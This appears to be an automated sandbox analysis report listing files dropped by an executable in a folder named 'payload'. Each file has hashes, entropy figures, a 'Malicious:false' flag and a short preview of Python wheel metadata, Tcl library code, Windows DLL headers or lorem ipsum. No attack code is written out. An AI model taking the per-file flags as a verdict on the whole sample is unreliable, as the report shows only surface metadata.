                                                                                                                                                                                                                                            SHA1:78363672264D9CD3F72D5C1D3665E1657B1A5071
                                                                                                                                                                                                                                            SHA-256:37FEDCFFBF73C4EB9F058F47677CB33203A436FF9390E4D38A8E01C9DAD28E0B
                                                                                                                                                                                                                                            SHA-512:A4CDF92725E1D740758DA4DD28DF5D1131F70CEF46946B173FE6956CC0341F019D7C4FECC3C9605F354E1308858721DADA825B4C19F59C5AD1CE01AB84C46B24
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum..Curabitur pretium tincidunt lacus. Nulla gravida orci a odio. Nullam varius, turpis et commodo pharetra, est eros bibendum elit, nec luctus magna felis sollicitudin mauris. Integer in mauris eu nibh euismod gravida. Duis ac tellus et risus vulputate vehicula. Donec lobortis risus a elit. Etiam tempor. Ut ullamcorper, ligula eu tempor congue, eros est euismod turpis, id tincidunt sapien risus a quam. Maecenas fermentum consequat mi. Donec fermentum. Pellentesque malesuada nulla a mi. Duis sapien sem, aliquet nec, commodo eget, consequat quis, neque.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1107
                                                                                                                                                                                                                                            Entropy (8bit):5.115074330424529
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:PWmrRONJHLH0cPP3gtkHw1h39QHOsUv4eOk4/+jvho3nPz:ttONJbbvE/NQHOs5eNS3n7
                                                                                                                                                                                                                                            MD5:7FFB0DB04527CFE380E4F2726BD05EBF
                                                                                                                                                                                                                                            SHA1:5B39C45A91A556E5F1599604F1799E4027FA0E60
                                                                                                                                                                                                                                            SHA-256:30C23618679108F3E8EA1D2A658C7CA417BDFC891C98EF1A89FA4FF0C9828654
                                                                                                                                                                                                                                            SHA-512:205F284F3A7E8E696C70ED7B856EE98C1671C68893F0952EEC40915A383BC452B99899BDC401F9FE161A1BF9B6E2CEA3BCD90615EEE9173301657A2CE4BAFE14
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MIT License..Copyright (c) 2012 Daniel Holth <dholth@fastmail.fm> and contributors..Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR.OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERW
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2153
                                                                                                                                                                                                                                            Entropy (8bit):5.088249746074878
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:DEhpFu5MktjaywDK48d+md+7uT8RfkD1UKd+mOl1Awry:DEhpiMktjayq/7kOfsUzmbYy
                                                                                                                                                                                                                                            MD5:EBEA27DA14E3F453119DC72D84343E8C
                                                                                                                                                                                                                                            SHA1:7CEB6DBE498B69ABF4087637C6F500742FF7E2B4
                                                                                                                                                                                                                                            SHA-256:59BAC22B00A59D3E5608A56B8CF8EFC43831A36B72792EE4389C9CD4669C7841
                                                                                                                                                                                                                                            SHA-512:A41593939B9325D40CB67FD3F41CD1C9E9978F162487FB469094C41440B5F48016B9A66BE2E6E4A0406D6EEDB25CE4F5A860BA1E3DC924B81F63CEEE3AE31117
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: wheel.Version: 0.43.0.Summary: A built-package format for Python.Keywords: wheel,packaging.Author-email: Daniel Holth <dholth@fastmail.fm>.Maintainer-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Dist: pytest >= 6.0.0 ; extra == "test".Requires-Dist: setuptools >= 65 ; extra == "test".Project-URL: Changelog, https://wheel.readthedocs.io/en/s
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4557
                                                                                                                                                                                                                                            Entropy (8bit):5.714200636114494
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:QXVuEmegx01TQIvFCiq9H/H7vp88FxTXiJPkGJP4CWweXQHmnDpMI78IegK5EeZR:QXVxAbYkU4CWweXQHmnDpMeV2BvTRqQF
                                                                                                                                                                                                                                            MD5:44D352C4997560C7BFB82D9360F5985A
                                                                                                                                                                                                                                            SHA1:BE58C7B8AB32790384E4E4F20865C4A88414B67A
                                                                                                                                                                                                                                            SHA-256:783E654742611AF88CD9F00BF01A431A219DB536556E63FF981C7BD673070AC9
                                                                                                                                                                                                                                            SHA-512:281B1D939A560E6A08D0606E5E8CE15F086B4B45738AB41ED6B5821968DC8D764CD6B25DB6BA562A07018C271ABF17A6BC5A380FAD05696ADF1D11EE2C5749C8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:../../bin/wheel,sha256=cT2EHbrv-J-UyUXu26cDY-0I7RgcruysJeHFanT1Xfo,249..wheel-0.43.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..wheel-0.43.0.dist-info/LICENSE.txt,sha256=MMI2GGeRCPPo6h0qZYx8pBe9_IkcmO8aifpP8MmChlQ,1107..wheel-0.43.0.dist-info/METADATA,sha256=WbrCKwClnT5WCKVrjPjvxDgxo2tyeS7kOJyc1GaceEE,2153..wheel-0.43.0.dist-info/RECORD,,..wheel-0.43.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..wheel-0.43.0.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..wheel-0.43.0.dist-info/entry_points.txt,sha256=rTY1BbkPHhkGMm4Q3F0pIzJBzW2kMxoG1oriffvGdA0,104..wheel/__init__.py,sha256=D6jhH00eMzbgrXGAeOwVfD5i-lCAMMycuG1L0useDlo,59..wheel/__main__.py,sha256=NkMUnuTCGcOkgY0IBLgBCVC_BGGcWORx2K8jYGS12UE,455..wheel/__pycache__/__init__.cpython-312.pyc,,..wheel/__pycache__/__main__.cpython-312.pyc,,..wheel/__pycache__/_setuptools_logging.cpython-312.pyc,,..wheel/__pycache__/bdist_wheel.cpython-312.pyc,,..wheel/__pycache
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):81
                                                                                                                                                                                                                                            Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                                                                                                                                                            MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                                                                                                                                                            SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                                                                                                                                                                                                            SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                                                                                                                                                            SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):104
                                                                                                                                                                                                                                            Entropy (8bit):4.271713330022269
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:1SSAnAYgh+MWTMhk6WjrAM5t5ln:1Jb9WTMhk9jUM5t5ln
                                                                                                                                                                                                                                            MD5:6180E17C30BAE5B30DB371793FCE0085
                                                                                                                                                                                                                                            SHA1:E3A12C421562A77D90A13D8539A3A0F4D3228359
                                                                                                                                                                                                                                            SHA-256:AD363505B90F1E1906326E10DC5D29233241CD6DA4331A06D68AE27DFBC6740D
                                                                                                                                                                                                                                            SHA-512:69EAE7B1E181D7BA1D3E2864D31E1320625A375E76D3B2FBF8856B3B6515936ACE3138D4D442CABDE7576FCFBCBB0DEED054D90B95CFA1C99829DB12A9031E26
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:[console_scripts].wheel=wheel.cli:main..[distutils.commands].bdist_wheel=wheel.bdist_wheel:bdist_wheel..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1816344
                                                                                                                                                                                                                                            Entropy (8bit):6.495049871908257
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24576:CAZ2kQrvqkPY6i6ktWc2uMOxmWu1/0lglMkgshwlfjwtorWy2eMdPhOC9JlQ5ZDR:CA0W9jEoSy2nd9JlQjaq5vWHZ7XM2eDD
                                                                                                                                                                                                                                            MD5:3AE729942D15F4F48B1EA8C91880F1F4
                                                                                                                                                                                                                                            SHA1:D27596D14AF5ADEB02EDAB74859B763BF6AC2853
                                                                                                                                                                                                                                            SHA-256:FE62CA2B01B0EC8A609B48F165CA9C6A91653D3966239243AD352DD4C8961760
                                                                                                                                                                                                                                            SHA-512:355800E9152DAAD675428421B867B6D48E2C8F8BE9CA0284F221F27FAE198C8F07D90980E04D807B50A88F92FFB946DC53B7564E080E2E0684F7F6CCC84FF245
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......1.y+u..xu..xu..x...yw..x...xv..x...yx..x...y}..x...yq..x..yw..x|..xg..x...yt..x...yx..xu..x]..x...y...x...yt..x...xt..x...yt..xRichu..x........................PE..d...1,.c.........." ...!.............................................................j....`..............................................`.. _..h.......8................/..........................................`...@............0...............................text............................... ..`.rdata..|L...0...N..................@..@.data...."...........f..............@....pdata...............n..............@..@.rsrc...8............f..............@..@.reloc...............j..............@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11707
                                                                                                                                                                                                                                            Entropy (8bit):5.03328629946697
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:rXlm2LnoZ7k2mOEhYoKVtWD2xLsmF+MNlPQ4lJ+B0O0DgryYY/+zy7go:rXlm2Lng7kvF2VtWD2xLeMNT+B0O0Urk
                                                                                                                                                                                                                                            MD5:A0B269D76DB613C2D927EFA84FEE88E2
                                                                                                                                                                                                                                            SHA1:F9C7AD375F4D4223F0668FA1E2C4E5A83CAC2D03
                                                                                                                                                                                                                                            SHA-256:32348D51F3637F375B056FE99E9B4D89D85D45DB907847DC370BD72812A2E2FE
                                                                                                                                                                                                                                            SHA-512:5427762147825DC2ED3FEEE4011BBF2100932A4D93F3242CCAD15499C9DC39F42A82AEB42ED5DB5839560CD7AAE5D30621AC3694552FFC650A1F572CEE32FA54
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# -*- tcl -*-..# ### ### ### ######### ######### #########..## Overview....# Heuristics to assemble a platform identifier from publicly available..# information. The identifier describes the platform of the currently..# running tcl shell. This is a mixture of the runtime environment and..# of build-time properties of the executable itself...#..# Examples:..# <1> A tcl shell executing on a x86_64 processor, but having a..# wordsize of 4 was compiled for the x86 environment, i.e. 32..# bit, and loaded packages have to match that, and not the..# actual cpu...#..# <2> The hp/solaris 32/64 bit builds of the core cannot be..# distinguished by looking at tcl_platform. As packages have to..# match the 32/64 information we have to look in more places. In..# this case we inspect the executable itself (magic numbers,..# i.e. fileutil::magic::filetype)...#..# The basic information used comes out of the 'os' and 'machine'..# entries of the 'tcl_platform' array. A number of general and
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6218
                                                                                                                                                                                                                                            Entropy (8bit):4.843141834641668
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:PV5U+VLnNUPVvH+knNUPVUHD5ngWftN+IgMufIdqi+g0SYiCXVDjqL:Nm6MFXN5uwq51iCFD2
                                                                                                                                                                                                                                            MD5:8ABC3029963E433D1D9865AAA7E1057B
                                                                                                                                                                                                                                            SHA1:A88091DC98B2FD0AE3A258B59F8BE43F41F04323
                                                                                                                                                                                                                                            SHA-256:0A6B4B109CFDFC4B40FBDEFDB2282F9B1AF3CC2F9624DD39958EEBD78781AFB2
                                                                                                                                                                                                                                            SHA-512:D5068375615A2200DDC13EEB852B2E21B7E4AA416FB7A0E97C98B8B106D7701792C523739E8BF266D2ABE411D4298A0B5B3884CFB9DF820FD4A2B61B22F9DECF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:..# -*- tcl -*-..# ### ### ### ######### ######### #########..## Overview....# Higher-level commands which invoke the functionality of this package..# for an arbitrary tcl shell (tclsh, wish, ...). This is required by a..# repository as while the tcl shell executing packages uses the same..# platform in general as a repository application there can be..# differences in detail (i.e. 32/64 bit builds).....# ### ### ### ######### ######### #########..## Requirements....package require platform..namespace eval ::platform::shell {}....# ### ### ### ######### ######### #########..## Implementation....# -- platform::shell::generic....proc ::platform::shell::generic {shell} {.. # Argument is the path to a tcl shell..... CHECK $shell.. LOCATE base out.... set code {}.. # Forget any pre-existing platform package, it might be in.. # conflict with this one... lappend code {package forget platform}.. # Inject our platform package.. lappend code [list source $base]..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):35136
                                                                                                                                                                                                                                            Entropy (8bit):4.945501767273492
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:m3xQvCzasI/rHPG2yfkZ0Kbh91iQ3Lnq5MIVYB8mbgijsPIWtw4qvUm:4xQvCzasIDHPG2yW0kJ32imXmUij6JjG
                                                                                                                                                                                                                                            MD5:BD4FF2A1F742D9E6E699EEEE5E678AD1
                                                                                                                                                                                                                                            SHA1:811AD83AFF80131BA73ABC546C6BD78453BF3EB9
                                                                                                                                                                                                                                            SHA-256:6774519F179872EC5292523F2788B77B2B839E15665037E097A0D4EDDDD1C6FB
                                                                                                                                                                                                                                            SHA-512:B77E4A68017BA57C06876B21B8110C636F9BA1DD0BA9D7A0C50096F3F6391508CF3562DD94ACEAF673113DBD336109DA958044AEFAC0AFB0F833A652E4438F43
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# msgcat.tcl --..#..#.This file defines various procedures which implement a..#.message catalog facility for Tcl programs. It should be..#.loaded with the command "package require msgcat"...#..# Copyright (c) 2010-2015 Harald Oehlmann...# Copyright (c) 1998-2000 Ajuba Solutions...# Copyright (c) 1998 Mark Harrison...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....package require Tcl 8.5-..# When the version number changes, be sure to update the pkgIndex.tcl file,..# and the installation directory in the Makefiles...package provide msgcat 1.6.1....namespace eval msgcat {.. namespace export mc mcexists mcload mclocale mcmax mcmset mcpreferences mcset\.. mcunknown mcflset mcflmset mcloadedlocales mcforgetpackage\... mcpackageconfig mcpackagelocale.... # Records the list of locales to search.. variable Loclist {}.... # List of currently loaded locales.. variable LoadedLoc
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Tcl script, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):107674
                                                                                                                                                                                                                                            Entropy (8bit):4.841458743618635
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:74s6YTLsaoi4N8uBPM5PP9AlGXJL/ciBh:7N6Y9oi4N8uBPM5PP9AYXJL/ciBh
                                                                                                                                                                                                                                            MD5:655EC828777244F9F048E0D08203482F
                                                                                                                                                                                                                                            SHA1:790446D04FE7BE12FD5DCF6E6FBD4C5A08C45C98
                                                                                                                                                                                                                                            SHA-256:35A88F56DF57E6AC6F2CCC4D193210FBB9BD224AC99670603E077DDF8C5610BC
                                                                                                                                                                                                                                            SHA-512:C249CAA5DA76A0B0876DD1BD201FF2D249D4FCD8467992C9DE51BA5A1C5471F98C10D69C46DF5B25DBA7941F4301B446D90CBF17BCCFB8B0ED27B22BF4DA20F3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# tcltest.tcl --..#..#.This file contains support code for the Tcl test suite. It..# defines the tcltest namespace and finds and defines the output..# directory, constraints available, output and error channels,..#.etc. used by Tcl tests. See the tcltest man page for more..#.details...#..# This design was based on the Tcl testing approach designed and..# initially implemented by Mary Ann May-Pumphrey of Sun..#.Microsystems...#..# Copyright . 1994-1997 Sun Microsystems, Inc...# Copyright . 1998-1999 Scriptics Corporation...# Copyright . 2000 Ajuba Solutions..# Contributions from Don Porter, NIST, 2002. (not subject to US copyright)..# All rights reserved.....package require Tcl 8.5-..;# -verbose line uses [info frame]..namespace eval tcltest {.... # When the version number changes, be sure to update the pkgIndex.tcl file,.. # and the install directory in the Makefiles. When the minor version.. # changes (new feature) be sure to update the man page
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):118419
                                                                                                                                                                                                                                            Entropy (8bit):4.888789841897662
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:RYY1IO/KuUhIW17zr1DLJuuBuFsj6aIsGc3e6xGxjndp72y4ebBxIQ30Ik:RbyOCuUv9r5LJmsjlxTxGxjndpCBeAQ0
                                                                                                                                                                                                                                            MD5:ACB85FEB97B27F1362E1D76B686D498F
                                                                                                                                                                                                                                            SHA1:92C370F838BD67C72E153FBF7AD05E26FF40A393
                                                                                                                                                                                                                                            SHA-256:7A30E7A49C1F6939537EB7A80CF2F5BC7A4969F2B2AD99BA4E26DB85BBC2FCC7
                                                                                                                                                                                                                                            SHA-512:EA504863386817E1B21549376148FD05C7EAF74F91A3A8DA97EFCF3784530ED3CF1910DF9B2431EC47D1175759CDEB1A0E9E9E02BBA94EC2123EAFB7CBD2B90A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# http.tcl --..#..#.Client-side HTTP for GET, POST, and HEAD commands. These routines can..#.be used in untrusted code that uses the Safesock security policy...#.These procedures use a callback interface to avoid using vwait, which..#.is not defined in the safe base...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES.....package require Tcl 8.6-..# Keep this in sync with pkgIndex.tcl and with the install directories in..# Makefiles..package provide http 2.9.8....namespace eval http {.. # Allow resourcing to not clobber existing data.... variable http.. if {![info exists http]} {...array set http {... -accept */*... -pipeline 1... -postfresh 0... -proxyhost {}... -proxyport {}... -proxyfilter http::ProxyRequired... -repost 0... -urlencoding utf-8... -zip 1...}...# We need a useragent string of this style or various servers will...# refuse to send us compressed content
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1555736
                                                                                                                                                                                                                                            Entropy (8bit):6.1820383306760185
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24576:gJ3uXVFKflt2zwvzPYHURwgVdF9EWyCzfdmHQnveD4CGan9nViFoHb15K3cmwdbo:yeFSpvzg0RwgVdF9EWyCzfdmHQnveD4Z
                                                                                                                                                                                                                                            MD5:966580716C0D6B7EEC217071A6DF6796
                                                                                                                                                                                                                                            SHA1:E3D2D4A7EC61D920130D7A745586CEB7AAD4184D
                                                                                                                                                                                                                                            SHA-256:AFC13FCE0690C0A4B449EC7ED4FB0233A8359911C1C0BA26A285F32895DBB3D2
                                                                                                                                                                                                                                            SHA-512:CF0675EA888A6D1547842BCFB27D45815B164337B4A285253716917EB157C6DF3CC97CBA8AD2AB7096E8F5131889957E0555BAE9B5A8B64745AC3D2F174E3224
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y.P.=n>.=n>.=n>...?.?n>...;.1n>...:.5n>...=.9n>...:.>n>...:.<n>.4...-n>...?.(n>.=n?.wo>...6..n>...>.<n>.....<n>...<.<n>.Rich=n>.................PE..d...],.c.........." ...!............|...............................................4=....`..........................................?..L@..,...|........{...P..D......../.......E...T...............................S..@...............@............................text...h........................... ..`.rdata..0...........................@..@.data...............................@....pdata..D....P......................@..@.rsrc....{.......|..................@..@.reloc...E.......F...H..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1138456
                                                                                                                                                                                                                                            Entropy (8bit):5.461877321211646
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:FrEHdcM6hb/CjJ43w9hIpCQvb0QN8MdIEQ+U2BNNmD+99FfcAa1:FrEXaCjfk7bPNfv42BN6yzUAa1
                                                                                                                                                                                                                                            MD5:B848E259FABAF32B4B3C980A0A12488D
                                                                                                                                                                                                                                            SHA1:DA2E864E18521C86C7D8968DB74BB2B28E4C23E2
                                                                                                                                                                                                                                            SHA-256:C65073B65F107E471C9BE3C699FB11F774E9A07581F41229582F7B2154B6FC3C
                                                                                                                                                                                                                                            SHA-512:4C6953504D1401FE0C74435BCEEBC5EC7BF8991FD42B659867A3529CEE5CC64DA54F1AB404E88160E747887A7409098F1A85A546BC40F12F0DDE0025408F9E27
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#.}.#.}.#.}.*..%.}..*|.!.}..*~. .}..*y.+.}..*x...}.6-|. .}.h.|.!.}.#.|.s.}.6-p.".}.6-}.".}.6-..".}.6-..".}.Rich#.}.........PE..d....f.........." ...(.@..........0*.......................................p......]M....`.........................................p...X............P.......@.......0.../...`......P^..T............................]..@............P..p............................text...!>.......@.................. ..`.rdata..\....P.......D..............@..@.data........ ......................@....pdata.......@......................@..@.rsrc........P.......$..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):146712
                                                                                                                                                                                                                                            Entropy (8bit):6.609302620823316
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:7qLKjJj3yg1shVjm4OvfqnKAh2mrohmR5JHDbuNy:7qGEgSefI3roCDbV
                                                                                                                                                                                                                                            MD5:4FADEDA3C1DA95337B67D15C282D49D8
                                                                                                                                                                                                                                            SHA1:F49EE3256F8F5746515194114F7EF73D6B6141C0
                                                                                                                                                                                                                                            SHA-256:28484BCEA1E387C4A41564AF8F62C040FE203FE2491E415CE90F3D7F5C7AB013
                                                                                                                                                                                                                                            SHA-512:45634CAF9D9214F0E45E11A1539D8663B45527E1AE9282558B5FDB8465D90B0FABCF4C0E508504427A597BA390C029BC12068AC17D842FD0FCBB1886D252C6B1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...x.Oc..........."...'............P..........A.....................................W....`... ......................................@.......P..8......................../......................................(....................Q..p............................text...............................`..`.data...............................@....rdata...W.......X..................@..@.pdata..............................@..@.xdata....... ......................@..@.bss.........0...........................edata.......@......................@..@.idata..8....P......................@....CRT....X....`......................@....tls.........p......................@....rsrc...............................@....reloc..............................@..B................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
